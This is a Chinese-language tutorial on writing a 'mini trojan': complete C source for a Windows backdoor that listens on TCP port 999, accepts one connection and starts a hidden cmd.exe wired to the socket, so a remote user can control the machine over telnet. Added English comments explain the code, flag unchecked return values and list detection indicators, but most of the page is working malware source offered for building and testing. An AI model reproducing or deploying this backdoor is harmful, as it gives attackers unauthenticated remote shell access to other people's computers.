MINI木马的编写
编写一个服务端,服务端开启远程后门
客户端使用telnet命令来操控该木马
先进行服务端的编写
/*
 * Network half of the server fragment: bring up Winsock 2.2, create a TCP
 * listener bound to every local interface (INADDR_ANY) on port MasterPort,
 * and block until exactly one peer connects. No return value is checked, so
 * a failed WSAStartup/bind/listen/accept goes unnoticed and the later code
 * would operate on an invalid socket. The accepted socket is handed to the
 * remote peer without any authentication; from a defender's view the
 * artefact to watch is an unexpected process listening on MasterPort.
 */
WSADATA wsaData;
SOCKET ServiceSocket,ClientSocket;
SOCKADDR_IN SockAddr;
int SockAddrSize;
WSAStartup(MAKEWORD(2, 2), &wsaData);
SockAddr.sin_family = AF_INET;
SockAddr.sin_addr.S_un.S_addr = INADDR_ANY;
SockAddr.sin_port = htons(MasterPort);
ServiceSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,NULL,0,0);
bind(ServiceSocket, (SOCKADDR*)&SockAddr, sizeof(SockAddr));
listen(ServiceSocket, 1); // backlog of one: a second connection attempt is queued or refused
SockAddrSize = sizeof(SockAddr);
ClientSocket = accept(ServiceSocket, (SOCKADDR*)&SockAddr, &SockAddrSize); // blocks; SockAddr is overwritten with the peer address
先来编写网络通信,使用的是流套接字,也就是TCP网络编程
定义相关变量,初始化Windows套接字,然后定义SOCKADDR_IN的相关变量,创建服务端的套接字,将套接字与IP进行绑定,然后进行监听,等待客户端连接。
接下来就是创建一个进程,用来从目的机中获取我们需要的信息
/*
 * Process half of the server fragment: launch the COMSPEC shell with the
 * accepted socket (ClientSocket, from the network fragment above) as its
 * stdin, stdout and stderr. Because CreateProcess is called with
 * bInheritHandles = TRUE, the socket handle is inherited by the child and
 * every byte the remote peer sends is read by the shell as a command.
 * Defender note: a cmd.exe whose standard handles are a socket handle is the
 * distinctive host-side indicator of this pattern.
 */
// Create a process
PROCESS_INFORMATION ProcessInfo; // process information
STARTUPINFO StartupInfo; // startup information
char szCMDPath[255];
ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo, sizeof(StartupInfo));
// Get the shell path from the COMSPEC environment variable. The return value
// is not checked: if COMSPEC is unset or does not fit in 255 bytes,
// szCMDPath is left uninitialised/undefined and CreateProcess gets garbage.
GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));
StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow =SW_HIDE; // no visible console window for the child
StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
StartupInfo.hStdInput = (HANDLE)ClientSocket;// wire the console to the socket: the socket becomes the shell's standard input
StartupInfo.hStdOutput = (HANDLE)ClientSocket;
StartupInfo.hStdError = (HANDLE)ClientSocket;
// Create the new process (handle inheritance enabled so the socket handle is usable by the child).
// The BOOL result is ignored, so a launch failure leaves ProcessInfo zeroed and the wait below operates on a NULL handle.
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE,0, NULL, NULL, &StartupInfo, &ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess, INFINITE); // block until the shell exits
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
先是进行变量的定义,将相关变量清零,获取一条路径,就是存在cmd.exe可执行程序的路径,定义启动信息中的内容,可以参考下面这条博客,了解STARTUPINFO结构体中的内容
https://blog.csdn.net/whynottrythis/article/details/39828395
然后创建新的进程,WaitForSingleObject用于等待上面创建的进程结束后再继续往下执行,之后关闭进程句柄和线程句柄。
#pragma comment(lib,"ws2_32.lib")
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include<stdio.h>
#include<stdlib.h>
//#include<Windows.h>
#include<WinSock2.h>
#define MasterPort 999
/*
 * Entry point of the bind-shell backdoor described on this page.
 *
 * Flow: initialise Winsock 2.2, listen on TCP port MasterPort on every local
 * interface, accept a single connection, then start the COMSPEC shell
 * (normally cmd.exe) with the accepted socket as its stdin/stdout/stderr so
 * the remote peer drives the shell directly. There is no authentication of
 * the peer and no return value of any Win32/Winsock call is checked.
 *
 * Defender notes: the observable artefacts are an unexpected listener on
 * MasterPort and a cmd.exe whose standard handles are a socket handle
 * inherited from its parent (bInheritHandles = TRUE in CreateProcess). Host
 * firewall rules that block inbound connections to unapproved ports, and
 * endpoint rules that alert on a shell launched with socket standard
 * handles, both cover this pattern.
 *
 * Non-standard: `void main()` — C requires `int main(void)`; the commented
 * `return 0;` at the end hints this was once an int-returning main.
 */
void main()
{
WSADATA wsaData;
SOCKET ServiceSocket,ClientSocket;
SOCKADDR_IN SockAddr;
int SockAddrSize;
// Create a process
PROCESS_INFORMATION ProcessInfo; // process information
STARTUPINFO StartupInfo; // startup information
char szCMDPath[255];
ZeroMemory(&ProcessInfo, sizeof(PROCESS_INFORMATION));
ZeroMemory(&StartupInfo, sizeof(StartupInfo));
// Get the shell path from the COMSPEC environment variable. The return value
// is not checked: if COMSPEC is unset or does not fit in 255 bytes,
// szCMDPath is left uninitialised/undefined and CreateProcess gets garbage.
GetEnvironmentVariable("COMSPEC", szCMDPath, sizeof(szCMDPath));
//printf("%s\n", szCMDPath);
WSAStartup(MAKEWORD(2, 2), &wsaData); // request Winsock 2.2; result unchecked
SockAddr.sin_family = AF_INET;
SockAddr.sin_addr.S_un.S_addr = INADDR_ANY; // listen on all local interfaces
SockAddr.sin_port = htons(MasterPort);
ServiceSocket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,NULL,0,0);
bind(ServiceSocket, (SOCKADDR*)&SockAddr, sizeof(SockAddr)); // failure (e.g. port in use) is not detected
listen(ServiceSocket, 1); // backlog of one: only a single pending connection is queued
SockAddrSize = sizeof(SockAddr);
// Blocks until a peer connects; SockAddr is overwritten with the peer address.
// An INVALID_SOCKET result is not checked and would be passed on as a std handle below.
ClientSocket = accept(ServiceSocket, (SOCKADDR*)&SockAddr, &SockAddrSize);
// //send(ServiceSocket, "Hello! \n", sizeof("Hello!"), 0);
// //printf("Send OK! \n");
StartupInfo.cb = sizeof(STARTUPINFO);
StartupInfo.wShowWindow =SW_HIDE; // no visible console window for the child
StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
StartupInfo.hStdInput = (HANDLE)ClientSocket;// wire the console to the socket: the socket becomes the shell's standard input
StartupInfo.hStdOutput = (HANDLE)ClientSocket;
StartupInfo.hStdError = (HANDLE)ClientSocket;
// Create the new process with handle inheritance enabled so the child can use
// the socket handle. The BOOL result is ignored: on failure ProcessInfo stays
// zeroed and the wait below operates on a NULL handle.
CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE,0, NULL, NULL, &StartupInfo, &ProcessInfo);
WaitForSingleObject(ProcessInfo.hProcess, INFINITE); // block until the shell exits
CloseHandle(ProcessInfo.hProcess);
CloseHandle(ProcessInfo.hThread);
// Tear down both sockets and Winsock; the program serves exactly one session.
closesocket(ServiceSocket);
closesocket(ClientSocket);
WSACleanup();
system("pause"); // keeps the (hidden-child's parent) console open; spawns a shell via system()
//return 0;
}
完整代码,创建完成后可以在虚拟机中进行测试,但是因为本身比较简单,需要自己启动,启动以后就可以在本机中使用telnet+目的机IP+999进行控制了,使用windows命令行来控制,需要自己去了解windows命令行中的命令。